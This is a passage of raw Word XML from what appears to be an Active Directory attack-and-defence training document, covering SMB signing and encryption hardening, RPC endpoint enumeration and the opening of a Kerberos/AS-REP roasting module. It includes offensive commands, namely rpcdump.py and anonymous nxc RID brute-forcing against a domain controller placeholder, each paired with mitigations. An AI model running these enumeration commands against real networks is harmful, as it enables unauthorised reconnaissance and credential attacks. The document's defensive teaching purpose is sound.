          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0024425A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Prevents Man-in-the-Middle attacks (another form of an interception relay attack). It ensures that the communications between the endpoint and the DC have not been altered in transit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4538AEF2" w14:textId="77777777" w:rsidR="0024425A" w:rsidRPr="0024425A" w:rsidRDefault="00442C76" w:rsidP="0024425A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0024425A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Implementation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049D3F07" w14:textId="6EEE40CB" w:rsidR="00442C76" w:rsidRPr="0024425A" w:rsidRDefault="00442C76" w:rsidP="0024425A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0024425A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Enforce these settings via Group Policy Object (GPO) enforcement:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753EE71E" w14:textId="4C5FB8CB" w:rsidR="00442C76" w:rsidRPr="0024425A" w:rsidRDefault="00442C76" w:rsidP="0024425A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0024425A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options =&gt; Microsoft Network Server: Digitally sign communications (always).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FC3DD9" w14:textId="77777777" w:rsidR="0024425A" w:rsidRPr="00442C76" w:rsidRDefault="0024425A" w:rsidP="0024425A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7023C3C7" w14:textId="23A148F1" w:rsidR="0024425A" w:rsidRPr="0024425A" w:rsidRDefault="00442C76" w:rsidP="0024425A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">For encryption, use the PowerShell command: </w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Set-SmbServerConfiguration-EncryptData $true</w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0024425A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="628C5EDC" w14:textId="44B03A35" w:rsidR="009270EB" w:rsidRPr="009270EB" w:rsidRDefault="00BE0FA4" w:rsidP="00BE0FA4">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Control:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D53948F" w14:textId="4A5CBB5B" w:rsidR="00345479" w:rsidRDefault="00BE0FA4" w:rsidP="009270EB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00676591">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Remove Group Policy Preferences (GPP) cleartext passwords that are stored in XML files within </w:t>
      </w:r>
      <w:r w:rsidRPr="00AF0660">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SYSVOL</w:t>
      </w:r>
      <w:r w:rsidRPr="00676591">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (MS14-025 mitigation). Enforce SMB 3.11 encryption for all infrastructure communications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160C52BC" w14:textId="77777777" w:rsidR="00AF0660" w:rsidRPr="00676591" w:rsidRDefault="00AF0660" w:rsidP="00AF0660">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19BA98F1" w14:textId="30D29F96" w:rsidR="00BE0FA4" w:rsidRPr="00AF0660" w:rsidRDefault="00BE0FA4" w:rsidP="00BE0FA4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF0660">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Remote Procedure Call (RPC) Identity Mapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A799171" w14:textId="7B715D9A" w:rsidR="00BE0FA4" w:rsidRPr="00676591" w:rsidRDefault="00BE0FA4" w:rsidP="00BE0FA4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00676591">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Query the MSRPC Endpoint Mapper to uncover internal operating structures and identity endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411ADFF3" w14:textId="77777777" w:rsidR="00AF0660" w:rsidRPr="00AF0660" w:rsidRDefault="00AF0660" w:rsidP="00AF0660">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6398063B" w14:textId="4F0E6566" w:rsidR="006D3130" w:rsidRPr="009270EB" w:rsidRDefault="00BE0FA4" w:rsidP="00AF0660">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387EEFAB" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8640" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A33FA78" w14:textId="77777777" w:rsidR="006D3130" w:rsidRDefault="006D3130">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="80340D" w:themeColor="accent2" w:themeShade="80"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2D495FCA" w14:textId="77777777" w:rsidR="00AF0660" w:rsidRPr="00AF0660" w:rsidRDefault="00AF0660" w:rsidP="00AF0660">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AF0660">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="80340D" w:themeColor="accent2" w:themeShade="80"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t># Enumerate system endpoints bound to RPC infrastructure</w:t>
            </w:r>
            <w:r w:rsidRPr="00AF0660">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>rpcdump.</w:t>
            </w:r>
            <w:r w:rsidRPr="00AF0660">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000088"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>py</w:t>
            </w:r>
            <w:r w:rsidRPr="00AF0660">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00AF0660">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="006666"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>&lt;DC_IP&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00AF0660">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:r w:rsidRPr="00AF0660">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000088"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>p</w:t>
            </w:r>
            <w:r w:rsidRPr="00AF0660">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00AF0660">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="006666"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>135</w:t>
            </w:r>
            <w:r w:rsidRPr="00AF0660">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00AF0660">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00AF0660">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="80340D" w:themeColor="accent2" w:themeShade="80"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t># Conduct Security Identifier (SID) brute-forcing via RPC anonymous connections</w:t>
            </w:r>
            <w:r w:rsidRPr="00AF0660">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">nxc smb </w:t>
            </w:r>
            <w:r w:rsidRPr="00AF0660">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="006666"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>&lt;DC_IP&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00AF0660">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:r w:rsidRPr="00AF0660">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000088"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>u</w:t>
            </w:r>
            <w:r w:rsidRPr="00AF0660">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00AF0660">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="008800"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>' '</w:t>
            </w:r>
            <w:r w:rsidRPr="00AF0660">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:r w:rsidRPr="00AF0660">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000088"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>p</w:t>
            </w:r>
            <w:r w:rsidRPr="00AF0660">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00AF0660">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="008800"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>' '</w:t>
            </w:r>
            <w:r w:rsidRPr="00AF0660">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> –rd-brute</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0133BA4E" w14:textId="77777777" w:rsidR="006D3130" w:rsidRPr="00676591" w:rsidRDefault="006D3130">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="57BC0852" w14:textId="77777777" w:rsidR="006D3130" w:rsidRPr="006D3130" w:rsidRDefault="006D3130" w:rsidP="006D3130">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DC96A16" w14:textId="77777777" w:rsidR="009270EB" w:rsidRPr="009270EB" w:rsidRDefault="00BE0FA4" w:rsidP="00BE0FA4">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Control:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F95C1A" w14:textId="2CCCF46B" w:rsidR="00BE0FA4" w:rsidRDefault="00613A04" w:rsidP="009270EB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00676591">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Restrict access to Remote SAM (</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF0660">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>RestrictRemoteSAM</w:t>
      </w:r>
      <w:r w:rsidRPr="00676591">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) policies. Block anonymous access to the RPC Endpoint Mapper via host-based firewalls (Windows Defender Firewall).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733EA56E" w14:textId="77777777" w:rsidR="00AF0660" w:rsidRPr="00676591" w:rsidRDefault="00AF0660" w:rsidP="00AF0660">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="607DE25E" w14:textId="734EE483" w:rsidR="00613A04" w:rsidRPr="00294E91" w:rsidRDefault="00613A04" w:rsidP="00613A04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00294E91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Module 3: Authentication Security and Credential Assurance (Kerberos Attacks)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B0F884" w14:textId="77777777" w:rsidR="00AF0660" w:rsidRDefault="00AF0660" w:rsidP="00AF0660">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C54026B" w14:textId="77777777" w:rsidR="009270EB" w:rsidRPr="009270EB" w:rsidRDefault="00613A04" w:rsidP="009270EB">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Offensive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18C579CA" w14:textId="6F922EAC" w:rsidR="00442C76" w:rsidRPr="0024425A" w:rsidRDefault="00613A04" w:rsidP="0024425A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00676591">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Subvert Kerberos Delegations, bypass multi-factor constraints, and bypass modern Authenticators via offline brute-forcing of cryptographic ticket responses.</w:t>
      </w:r>
      <w:r w:rsidR="0024425A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="698B1DC7" w14:textId="77777777" w:rsidR="00442C76" w:rsidRDefault="00613A04" w:rsidP="00442C76">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Defensive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1897C573" w14:textId="46C75EC2" w:rsidR="00613A04" w:rsidRPr="00442C76" w:rsidRDefault="00613A04" w:rsidP="00442C76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Enforce AES-256 encryption constraints, demand Kerberos Pre-Authentication globally, rotate Kerberos Ticket Granting Service</w:t>
      </w:r>
      <w:r w:rsidR="00AF0660" w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (TGS)</w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> account passwords frequently, and mandate long, complex passphrases for Service Principal Names (SPNs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D2D38D" w14:textId="2D697F68" w:rsidR="00613A04" w:rsidRPr="00AF0660" w:rsidRDefault="00613A04" w:rsidP="00613A04">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF0660">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Technical Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C78F3F" w14:textId="19641C4D" w:rsidR="00613A04" w:rsidRPr="00AF0660" w:rsidRDefault="00613A04" w:rsidP="00613A04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF0660">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>AS-REP Roasting (Authentication Pre-Assurance Bypass)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFD92E5" w14:textId="12CAC4BE" w:rsidR="00613A04" w:rsidRPr="00676591" w:rsidRDefault="00613A04" w:rsidP="00613A04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00676591">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Identify identity principles missing mandatory Kerberos Pre-Authentication protections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574B09AF" w14:textId="77777777" w:rsidR="00AF0660" w:rsidRDefault="00AF0660" w:rsidP="00AF0660">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="106EBF6D" w14:textId="77777777" w:rsidR="0024425A" w:rsidRDefault="0024425A" w:rsidP="00AF0660">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E0B9088" w14:textId="77777777" w:rsidR="0024425A" w:rsidRDefault="0024425A" w:rsidP="00AF0660">
      <w:pPr>
